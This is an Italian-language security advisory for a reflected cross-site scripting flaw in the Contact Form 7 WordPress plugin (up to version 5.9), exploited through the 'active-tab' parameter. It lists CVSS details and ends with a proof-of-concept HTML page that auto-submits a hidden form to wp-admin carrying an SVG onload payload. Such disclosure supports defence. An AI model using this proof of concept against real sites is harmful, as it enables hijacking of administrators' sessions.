
Contact Form 7 <= 5.9 - Cross-Site Scripting riflesso
Contact Form 7 <= 5.9 - Cross-Site Scripting riflesso
Il plugin Contact Form 7 per WordPress è vulnerabile a Cross-Site Scripting riflesso tramite il parametro 'active-tab' in tutte le versioni fino alla 5.9 inclusa, a causa di una sanitizzazione degli input e di un escaping dell'output insufficienti. Ciò consente ad attaccanti non autenticati di iniettare script web arbitrari nelle pagine che vengono eseguiti se riescono a convincere un utente a compiere un'azione come cliccare su un link.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Devi conoscere il valore dell'ID del post su cui si trova il modulo, altrimenti quando l'amministratore clicca sul link non funzionerà. In generale, i privilegi richiesti dovrebbero essere H (High), poiché serve che un amministratore clicchi sul link.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>